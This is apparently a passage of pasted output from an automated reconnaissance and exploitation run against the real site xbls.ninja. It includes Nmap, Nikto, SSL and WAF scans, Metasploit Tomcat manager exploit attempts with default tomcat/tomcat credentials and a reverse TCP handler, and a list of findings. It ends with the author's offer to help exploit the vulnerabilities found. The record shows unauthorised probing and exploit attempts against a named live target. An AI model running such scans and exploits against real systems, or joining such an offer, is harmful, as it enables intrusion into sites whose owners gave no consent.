1637. + Server banner has changed from 'cloudflare-nginx' to '-nginx' which may suggest a WAF, load balancer or proxy is in place
1638. + 26099 requests: 0 error(s) and 2 item(s) reported on remote host
1639. + End Time: 2017-07-13 08:34:36 (GMT0) (485 seconds)
1640. ---------------------------------------------------------------------------
1641. + 1 host(s) tested
1642.  
1643. Starting Nmap 7.50 ( https://nmap.org ) at 2017-07-13 08:35 UTC
1644. Nmap scan report for xbls.ninja (104.27.135.184)
1645. Host is up (0.013s latency).
1646. Other addresses for xbls.ninja (not scanned): 104.27.134.184
1647.  
1648. PORT STATE SERVICE VERSION
1649. 8080/tcp open http Cloudflare nginx
1650. |_http-server-header: cloudflare-nginx
1651. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
1652. Device type: general purpose
1653. Running (JUST GUESSING): Linux 3.X|4.X|2.6.X (93%)
1654. OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:2.6
1655. Aggressive OS guesses: Linux 3.12 - 4.4 (93%), Linux 3.18 (88%), Linux 2.6.18 - 2.6.22 (86%), Linux 3.2 (85%)
1656. No exact OS matches for host (test conditions non-ideal).
1657. Network Distance: 7 hops
1658.  
1659. TRACEROUTE (using port 8080/tcp)
1660. HOP RTT ADDRESS
1661. 1 REMOVED FOR MY SECURITY
1662. 2 REMOVED FOR MY SECURITY
1663. 3 REMOVED FOR MY SECURITY
1664. 4 REMOVED FOR MY SECURITY
1665. 5 REMOVED FOR MY SECURITY
1666. 6 REMOVED FOR MY SECURITY
1667. 7 REMOVED FOR MY SECURITY
1668.  
1669. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
1670. Nmap done: 1 IP address (1 host up) scanned in 20.62 seconds
1671.  
1672. , ,
1673. / \
1674. ((__---,,,---__))
1675. (_) O O (_)_________
1676. \ _ / |\
1677. o_o \ M S F | \
1678. \ _____ | *
1679. ||| WW|||
1680. ||| |||
1681.  
1682.  
1683. =[ metasploit v4.14.28-dev ]
1684. + -- --=[ 1662 exploits - 951 auxiliary - 293 post ]
1685. + -- --=[ 486 payloads - 40 encoders - 9 nops ]
1686. + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
1687.  
1688. RHOST => xbls.ninja
1689. [-] WAR file not found
1690. [*] Auxiliary module execution completed
1691. RHOSTS => xbls.ninja
1692. [!] RHOST is not a valid option for this module. Did you mean RHOSTS?
1693. RHOST => xbls.ninja
1694. RPORT => 8080
1695. [*] Scanned 1 of 2 hosts (50% complete)
1696. [*] Scanned 2 of 2 hosts (100% complete)
1697. [*] Auxiliary module execution completed
1698. [*] Attempting to connect to 104.27.135.184:8080
1699. [+] No File(s) found
1700. [*] Scanned 1 of 2 hosts (50% complete)
1701. [*] Attempting to connect to 104.27.134.184:8080
1702. [+] No File(s) found
1703. [*] Scanned 2 of 2 hosts (100% complete)
1704. [*] Auxiliary module execution completed
1705. [*] 104.27.135.184:8080 - /admin/j_security_check - Checking j_security_check...
1706. [*] 104.27.135.184:8080 - /admin/j_security_check - Server returned: 403
1707. [-] http://104.27.135.184:8080/admin/j_security_check - Unable to enumerate users with this URI
1708. [*] Scanned 1 of 2 hosts (50% complete)
1709. [*] 104.27.134.184:8080 - /admin/j_security_check - Checking j_security_check...
1710. [*] 104.27.134.184:8080 - /admin/j_security_check - Server returned: 403
1711. [-] http://104.27.134.184:8080/admin/j_security_check - Unable to enumerate users with this URI
1712. [*] Scanned 2 of 2 hosts (100% complete)
1713. [*] Auxiliary module execution completed
1714. [-] 104.27.134.184:8080 - Authorization not requested
1715. [*] Scanned 1 of 2 hosts (50% complete)
1716. [-] 104.27.135.184:8080 - Authorization not requested
1717. [*] Scanned 2 of 2 hosts (100% complete)
1718. [*] Auxiliary module execution completed
1719. [*] Started reverse TCP handler on 192.168.0.2:4444
1720. [*] Attempting to automatically select a target...
1721. [-] Failed: Error requesting /manager/serverinfo
1722. [-] Exploit aborted due to failure: no-target: Unable to automatically select a target
1723. [*] Exploit completed, but no session was created.
1724. USERNAME => tomcat
1725. PASSWORD => tomcat
1726. [*] Started reverse TCP handler on 192.168.0.2:4444
1727. [*] Retrieving session ID and CSRF token...
1728. [-] Exploit aborted due to failure: unknown: Unable to access the Tomcat Manager
1729. [*] Exploit completed, but no session was created.
1730. + -- --=[Port 8180 closed... skipping.
1731. + -- --=[Port 8443 opened... running tests...
1732.  
1733. ^ ^
1734. _ __ _ ____ _ __ _ _ ____
1735. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
1736. | V V // o // _/ | V V // 0 // 0 // _/
1737. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
1738. <
1739. ...'
1740.  
1741. WAFW00F - Web Application Firewall Detection Tool
1742.  
1743. By Sandro Gauci && Wendel G. Henrique
1744.  
1745. Checking http://xbls.ninja:8443
1746. The site http://xbls.ninja:8443 is behind a CloudFlare
1747. Number of requests: 1
1748.  
1749. http://xbls.ninja:8443 [400 Bad Request] CloudFlare, Country[UNITED STATES][US], HTTPServer[cloudflare-nginx], IP[104.27.134.184], Title[400 The plain HTTP request was sent to HTTPS port], UncommonHeaders[cf-ray]
1750.  
1751.  
1752. __ ______ _____
1753. \ \/ / ___|_ _|
1754. \ /\___ \ | |
1755. / \ ___) || |
1756. /_/\_|____/ |_|
1757.  
1758. + -- --=[Cross-Site Tracer v1.3 by 1N3 @ CrowdShield
1759. + -- --=[Target: xbls.ninja:8443
1760. + -- --=[Site not vulnerable to Cross-Site Tracing!
1761. + -- --=[Site not vulnerable to Host Header Injection!
1762. + -- --=[Site vulnerable to Cross-Frame Scripting!
1763. + -- --=[Site vulnerable to Clickjacking!
1764.  
1765. HTTP/1.1 405 Not Allowed
1766. Server: cloudflare-nginx
1767. Date: Thu, 13 Jul 2017 06:37:10 GMT
1768. Content-Type: text/html
1769. Content-Length: 177
1770. Connection: close
1771. CF-RAY: -
1772.  
1773. <html>
1774. <head><title>405 Not Allowed</title></head>
1775. <body bgcolor="white">
1776. <center><h1>405 Not Allowed</h1></center>
1777. <hr><center>cloudflare-nginx</center>
1778. </body>
1779. </html>
1780.  
1781. HTTP/1.1 400 Bad Request
1782. Server: cloudflare-nginx
1783. Date: Thu, 13 Jul 2017 06:37:10 GMT
1784. Content-Type: text/html
1785. Content-Length: 275
1786. Connection: close
1787. CF-RAY: -
1788.  
1789. <html>
1790. <head><title>400 The plain HTTP request was sent to HTTPS port</title></head>
1791. <body bgcolor="white">
1792. <center><h1>400 Bad Request</h1></center>
1793. <center>The plain HTTP request was sent to HTTPS port</center>
1794. <hr><center>cloudflare-nginx</center>
1795. </body>
1796. </html>
1797.  
1798.  
1799.  
1800. Version: 1.11.10-static
1801. OpenSSL 1.0.2-chacha (1.0.2g-dev)
1802.  
1803. Testing SSL server xbls.ninja on port 8443 using SNI name xbls.ninja
1804.  
1805. TLS Fallback SCSV:
1806. Server does not support TLS Fallback SCSV
1807.  
1808. TLS renegotiation:
1809. Secure session renegotiation supported
1810.  
1811. TLS Compression:
1812. Compression disabled
1813.  
1814. Heartbleed:
1815. TLS 1.2 not vulnerable to heartbleed
1816. TLS 1.1 not vulnerable to heartbleed
1817. TLS 1.0 not vulnerable to heartbleed
1818.  
1819. Supported Server Cipher(s):
1820. Preferred TLSv1.2 256 bits ECDHE-ECDSA-CHACHA20-POLY1305 Curve P-256 DHE 256
1821. Accepted TLSv1.2 128 bits ECDHE-ECDSA-AES128-GCM-SHA256 Curve P-256 DHE 256
1822. Accepted TLSv1.2 128 bits ECDHE-ECDSA-AES128-SHA Curve P-256 DHE 256
1823. Accepted TLSv1.2 128 bits ECDHE-ECDSA-AES128-SHA256 Curve P-256 DHE 256
1824. Accepted TLSv1.2 256 bits ECDHE-ECDSA-AES256-GCM-SHA384 Curve P-256 DHE 256
1825. Accepted TLSv1.2 256 bits ECDHE-ECDSA-AES256-SHA Curve P-256 DHE 256
1826. Accepted TLSv1.2 256 bits ECDHE-ECDSA-AES256-SHA384 Curve P-256 DHE 256
1827. Preferred TLSv1.1 128 bits ECDHE-ECDSA-AES128-SHA Curve P-256 DHE 256
1828. Accepted TLSv1.1 256 bits ECDHE-ECDSA-AES256-SHA Curve P-256 DHE 256
1829. Preferred TLSv1.0 128 bits ECDHE-ECDSA-AES128-SHA Curve P-256 DHE 256
1830. Accepted TLSv1.0 256 bits ECDHE-ECDSA-AES256-SHA Curve P-256 DHE 256
1831.  
1832. SSL Certificate:
1833. Signature Algorithm: ecdsa-with-SHA256
1834. Subject: sni87911.cloudflaressl.com
1835. Altnames: DNS:sni87911.cloudflaressl.com, DNS:*.anhaniuso.top, DNS:*.bit.cm, DNS:*.charlottestowels.xyz, DNS:*.daypeada.top, DNS:*.dedinow.com, DNS:*.digitalgiftcodes.com, DNS:*.digitalpaymentgateway.com, DNS:*.giofalco.com, DNS:*.ideal-2vh3g.ga, DNS:*.landsdownefootandankle.com, DNS:*.learnlsp.com, DNS:*.lsp.academy, DNS:*.michaelfearne.com, DNS:*.nanovds.com, DNS:*.pro-palo.ru, DNS:*.scoresbuch.cf, DNS:*.summitvillegoodshopping.ga, DNS:*.swell-fstf8.ml, DNS:*.todaysfamilymagazine.com, DNS:*.txtbattle.ru, DNS:*.usadba-nsk.ru, DNS:*.xbls.ninja, DNS:*.xblsyndicate.ninja, DNS:anhaniuso.top, DNS:bit.cm, DNS:charlottestowels.xyz, DNS:daypeada.top, DNS:dedinow.com, DNS:digitalgiftcodes.com, DNS:digitalpaymentgateway.com, DNS:giofalco.com, DNS:ideal-2vh3g.ga, DNS:landsdownefootandankle.com, DNS:learnlsp.com, DNS:lsp.academy, DNS:michaelfearne.com, DNS:nanovds.com, DNS:pro-palo.ru, DNS:scoresbuch.cf, DNS:summitvillegoodshopping.ga, DNS:swell-fstf8.ml, DNS:todaysfamilymagazine.com, DNS:txtbattle.ru, DNS:usadba-nsk.ru, DNS:xbls.ninja, DNS:xblsyndicate.ninja
1836. Issuer: COMODO ECC Domain Validation Secure Server CA 2
1837.  
1838. Not valid before: Jul 6 00:00:00 2017 GMT
1839. Not valid after: Jan 12 23:59:59 2018 GMT
1840.  
1841.  
1842.  
1843. AVAILABLE PLUGINS
1844. -----------------
1845.  
1846. PluginCertInfo
1847. PluginSessionRenegotiation
1848. PluginHSTS
1849. PluginChromeSha1Deprecation
1850. PluginOpenSSLCipherSuites
1851. PluginCompression
1852. PluginSessionResumption
1853. PluginHeartbleed
1854.  
1855.  
1856.  
1857. CHECKING HOST(S) AVAILABILITY
1858. -----------------------------
1859.  
1860. xbls.ninja:8443 => 104.27.135.184:8443
1861.  
1862.  
1863.  
1864. SCAN RESULTS FOR XBLS.NINJA:8443 - 104.27.135.184:8443
1865. ------------------------------------------------------
1866.  
1867. * Deflate Compression:
1868. OK - Compression disabled
1869.  
1870. * Session Renegotiation:
1871. Client-initiated Renegotiations: OK - Rejected
1872. Secure Renegotiation: OK - Supported
1873.  
1874. * Session Resumption:
1875. With Session IDs: OK - Supported (5 successful, 0 failed, 0 errors, 5 total attempts).
1876. With TLS Session Tickets: OK - Supported
1877.  
1878. * Certificate - Content:
1879. SHA1 Fingerprint: abfb344f0354964ab4e2a0473d42e02e23acd61d
1880. Common Name: sni87911.cloudflaressl.com
1881. Issuer: COMODO ECC Domain Validation Secure Server CA 2
1882. Serial Number: CFF571D4DF39A468DFCA6E198BAE1FA7
1883. Not Before: Jul 6 00:00:00 2017 GMT
1884. Not After: Jan 12 23:59:59 2018 GMT
1885. Signature Algorithm: ecdsa-with-SHA256
1886. Public Key Algorithm: id-ecPublicKey
1887. Key Size: 256 bit
1888. X509v3 Subject Alternative Name: {'DNS': ['sni87911.cloudflaressl.com', '*.anhaniuso.top', '*.bit.cm', '*.charlottestowels.xyz', '*.daypeada.top', '*.dedinow.com', '*.digitalgiftcodes.com', '*.digitalpaymentgateway.com', '*.giofalco.com', '*.ideal-2vh3g.ga', '*.landsdownefootandankle.com', '*.learnlsp.com', '*.lsp.academy', '*.michaelfearne.com', '*.nanovds.com', '*.pro-palo.ru', '*.scoresbuch.cf', '*.summitvillegoodshopping.ga', '*.swell-fstf8.ml', '*.todaysfamilymagazine.com', '*.txtbattle.ru', '*.usadba-nsk.ru', '*.xbls.ninja', '*.xblsyndicate.ninja', 'anhaniuso.top', 'bit.cm', 'charlottestowels.xyz', 'daypeada.top', 'dedinow.com', 'digitalgiftcodes.com', 'digitalpaymentgateway.com', 'giofalco.com', 'ideal-2vh3g.ga', 'landsdownefootandankle.com', 'learnlsp.com', 'lsp.academy', 'michaelfearne.com', 'nanovds.com', 'pro-palo.ru', 'scoresbuch.cf', 'summitvillegoodshopping.ga', 'swell-fstf8.ml', 'todaysfamilymagazine.com', 'txtbattle.ru', 'usadba-nsk.ru', 'xbls.ninja', 'xblsyndicate.ninja']}
1889.  
1890. * Certificate - Trust:
1891. Hostname Validation: OK - Subject Alternative Name matches
1892. Google CA Store (09/2015): OK - Certificate is trusted
1893. Java 6 CA Store (Update 65): OK - Certificate is trusted
1894. Microsoft CA Store (09/2015): OK - Certificate is trusted
1895. Apple CA Store (OS X 10.10.5): OK - Certificate is trusted
1896. Mozilla NSS CA Store (09/2015): OK - Certificate is trusted
1897. Certificate Chain Received: ['sni87911.cloudflaressl.com', 'COMODO ECC Domain Validation Secure Server CA 2', 'COMODO ECC Certification Authority']
1898.  
1899. * Certificate - OCSP Stapling:
1900. OCSP Response Status: successful
1901. Validation w/ Mozilla's CA Store: OK - Response is trusted
1902. Responder Id: 40096167F0BC83714FDE12082C6FD4D42B763D96
1903. Cert Status: good
1904. Cert Serial Number: CFF571D4DF39A468DFCA6E198BAE1FA7
1905. This Update: Jul 8 21:50:39 2017 GMT
1906. Next Update: Jul 15 21:50:39 2017 GMT
1907.  
1908. * SSLV2 Cipher Suites:
1909. Server rejected all cipher suites.
1910.  
1911. * SSLV3 Cipher Suites:
1912. Server rejected all cipher suites.
1913.  
1914.  
1915.  
1916. SCAN COMPLETED IN 0.78 S
1917. ------------------------
1918. ███▄ ▄███▓ ▄▄▄ ██████ ██████ ▄▄▄▄ ██▓ ▓█████ ▓█████ ▓█████▄
1919. ▓██▒▀█▀ ██▒▒████▄ ▒██ ▒ ▒██ ▒ ▓█████▄ ▓██▒ ▓█ ▀ ▓█ ▀ ▒██▀ ██▌
1920. ▓██ ▓██░▒██ ▀█▄ ░ ▓██▄ ░ ▓██▄ ▒██▒ ▄██▒██░ ▒███ ▒███ ░██ █▌
1921. ▒██ ▒██ ░██▄▄▄▄██ ▒ ██▒ ▒ ██▒▒██░█▀ ▒██░ ▒▓█ ▄ ▒▓█ ▄ ░▓█▄ ▌
1922. ▒██▒ ░██▒ ▓█ ▓██▒▒██████▒▒▒██████▒▒░▓█ ▀█▓░██████▒░▒████▒░▒████▒░▒████▓
1923. ░ ▒░ ░ ░ ▒▒ ▓▒█░▒ ▒▓▒ ▒ ░▒ ▒▓▒ ▒ ░░▒▓███▀▒░ ▒░▓ ░░░ ▒░ ░░░ ▒░ ░ ▒▒▓ ▒
1924. ░ ░ ░ ▒ ▒▒ ░░ ░▒ ░ ░░ ░▒ ░ ░▒░▒ ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ▒ ▒
1925. ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
1926. ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
1927. ░ ░
1928. + -- --=[MÄŚŚBĻËËĐ V20160303 BŸ 1Ņ3 @ ĊŖÖŴĐŚȞÏËĻĐ - https://crowdshield.com
1929. + -- --=[Checking for DROWN (SSLv2): 104.27.135.184:8443
1930. + -- --=[Checking for HeartBleed: 104.27.135.184:8443
1931. + -- --=[Checking for OpenSSL CCS: 104.27.135.184:8443
1932. + -- --=[Checking for Poodle (SSLv3): 104.27.135.184:8443
1933. + -- --=[Checking for WinShock (MS14-066): 104.27.135.184:8443
1934. Testing if OpenSSL supports the ciphers we are checking for: YES
1935.  
1936. Testing 104.27.135.184:8443 for availability of SSL ciphers added in MS14-066...
1937. Testing cipher DHE-RSA-AES256-GCM-SHA384: UNSUPPORTED
1938. Testing cipher DHE-RSA-AES128-GCM-SHA256: UNSUPPORTED
1939. Testing cipher AES256-GCM-SHA384: UNSUPPORTED
1940. Testing cipher AES128-GCM-SHA256: UNSUPPORTED
1941. Checking if target system is running Windows Server 2012 or later...
1942. Testing cipher ECDHE-RSA-AES256-SHA384: UNSUPPORTED
1943. Testing cipher ECDHE-RSA-AES256-SHA: UNSUPPORTED
1944. 104.27.135.184:8443 is patched: NO
1945. + -- --=[Scan Complete!
1946. - Nikto v2.1.6
1947. ---------------------------------------------------------------------------
1948. + Target IP: 104.27.135.184
1949. + Target Hostname: xbls.ninja
1950. + Target Port: 8443
1951. ---------------------------------------------------------------------------
1952. + SSL Info: Subject: /OU=Domain Control Validated/OU=PositiveSSL Multi-Domain/CN=sni87911.cloudflaressl.com
1953. Ciphers: ECDHE-ECDSA-CHACHA20-POLY1305
1954. Issuer: /C=GB/ST=Greater Manchester/L=Salford/O=COMODO CA Limited/CN=COMODO ECC Domain Validation Secure Server CA 2
1955. + Start Time: 2017-07-13 08:36:49 (GMT0)
1956. ---------------------------------------------------------------------------
1957. + Server: cloudflare-nginx
1958. + Cookie __cfduid created without the secure flag
1959. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
1960. + Uncommon header 'cf-ray' found, with contents: 37da3bbb6a2086cd-ARN
1961. + All CGI directories 'found', use '-C none' to test none
1962. + The Content-Encoding header is set to "deflate" this may mean that the server is vulnerable to the BREACH attack.
1963. + ERROR: Error limit (20) reached for host, giving up. Last error: opening stream: can't connect: SSL negotiation failed: error:14094410:SSL routines:ssl3_read_bytes:sslv3 alert handshake failure at /var/lib/nikto/plugins/LW2.pm line 5157.
1964. at /var/lib/nikto/plugins/LW2.pm line 5157.
1965. ; at /var/lib/nikto/plugins/LW2.pm line 5157.
1966. + Scan terminated: 20 error(s) and 4 item(s) reported on remote host
1967. + End Time: 2017-07-13 08:37:16 (GMT0) (27 seconds)
1968. ---------------------------------------------------------------------------
1969. + 1 host(s) tested
1970.  
1971. Starting Nmap 7.50 ( https://nmap.org ) at 2017-07-13 08:37 UTC
1972. Nmap scan report for xbls.ninja (104.27.134.184)
1973. Host is up (0.023s latency).
1974. Other addresses for xbls.ninja (not scanned): 104.27.135.184
1975.  
1976. PORT STATE SERVICE VERSION
1977. 8443/tcp open ssl/http Cloudflare nginx
1978. |_http-server-header: cloudflare-nginx
1979. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
1980. Device type: general purpose
1981. Running (JUST GUESSING): Linux 3.X|4.X|2.6.X (93%)
1982. OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:2.6
1983. Aggressive OS guesses: Linux 3.12 - 4.4 (93%), Linux 3.18 (88%), Linux 2.6.18 - 2.6.22 (86%), OpenWrt Chaos Calmer (Linux 3.18) (85%), Linux 3.2 (85%)
1984. No exact OS matches for host (test conditions non-ideal).
1985. Network Distance: 7 hops
1986.  
1987. TRACEROUTE (using port 8443/tcp)
1988. HOP RTT ADDRESS
1989. 1 REMOVED FOR MY SECURITY
1990. 2 REMOVED FOR MY SECURITY
1991. 3 REMOVED FOR MY SECURITY
1992. 4 REMOVED FOR MY SECURITY
1993. 5 REMOVED FOR MY SECURITY
1994. 6 REMOVED FOR MY SECURITY
1995. 7 REMOVED FOR MY SECURITY
1996.  
1997. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
1998. Nmap done: 1 IP address (1 host up) scanned in 32.22 seconds
1999. + -- --=[Port 8888 closed... skipping.
2000. + -- --=[Port 10000 closed... skipping.
2001. + -- --=[Port 16992 closed... skipping.
2002. + -- --=[Port 27017 closed... skipping.
2003. + -- --=[Port 27018 closed... skipping.
2004. + -- --=[Port 27019 closed... skipping.
2005. + -- --=[Port 28017 closed... skipping.
2006. + -- --=[Port 49152 closed... skipping.
2007. + -- ----------------------------=[Scanning For Common Vulnerabilities]=----- -- +
2008. #########################################################################################
2009. oooooo oooo .o. .oooooo..o ooooo ooo .oooooo.
2010. `888. .8' .888. d8P' `Y8 `888' `8' d8P' `Y8b
2011. `888. .8' .88888. Y88bo. 888 8 888 888
2012. `888.8' .8' `888. `ZY8888o. 888 8 888 888
2013. `888' .88ooo8888. `0Y88b 888 8 888 888
2014. 888 .8' `888. oo .d8P `88. .8' `88b d88'
2015. o888o o88o o8888o 88888888P' `YbodP' `Y8bood8P'
2016. Welcome to Yasuo v2.3
2017. Author: Saurabh Harit (@0xsauby) | Contribution & Coolness: Stephen Hall (@logicalsec)
2018. #########################################################################################
2019.  
2020. I, [2017-07-13T08:38:20.252828 #4490] INFO -- : Initiating port scan
2021. I, [2017-07-13T08:39:22.956758 #4490] INFO -- : Using nmap scan output file logs/nmap_output_2017-07-13_08-38-20.xml
2022. I, [2017-07-13T08:39:22.979180 #4490] INFO -- : Discovered open port: 104.27.135.184:80
2023. I, [2017-07-13T08:39:23.050717 #4490] INFO -- : Discovered open port: 104.27.135.184:443
2024. I, [2017-07-13T08:39:23.110770 #4490] INFO -- : Discovered open port: 104.27.135.184:8080
2025. I, [2017-07-13T08:39:23.181973 #4490] INFO -- : Discovered open port: 104.27.135.184:8443
2026. W, [2017-07-13T08:39:23.254584 #4490] WARN -- : Yasuo did not find any potential hosts to enumerate
2027.  
2028. + -- ----------------------------=[Performing Full NMap Port Scan]=---------- -- +
2029. ==================================================
2030. THE END
2031.  
2032. I Canceled Nmap Port Scan (Took too long... xD)
2033. ==================================================
2034.  
2035. =================================================================================
2036. Some very interesting links....
2037.  
2038. https://www.tcpiputils.com/browse/domain/xbls.ninja
2039. http://toolbar.netcraft.com/site_report?url=xbls.ninja
2040. https://www.shodan.io/search?query=xbls.ninja\
2041. https://www.censys.io/ipv4/104.27.135.184
2042. http://www.hypestat.com/info/xbls.ninja
2043. https://crt.sh/?q=%25.xbls.ninja
2044. https://securityheaders.io/?q=xbls.ninja
2045. https://www.ssllabs.com/ssltest/analyze.html?d=xbls.ninja
2046. https://securityheaders.io/?q=xbls.ninja
2047. https://xbls.ninja/xmlrpc.php?rsd
2048. https://www.google.ca/search?q=site:pastebin.com+xbls.ninja
2049. https://www.google.ca/search?q=site:linkedin.com+employees+xbls.ninja
2050. =================================================================================
2051.  
2052. You can contact me via Quantizy@Protonmail.ch if you want help exploiting or wanna help me exploit some of these vulnerbilities. =))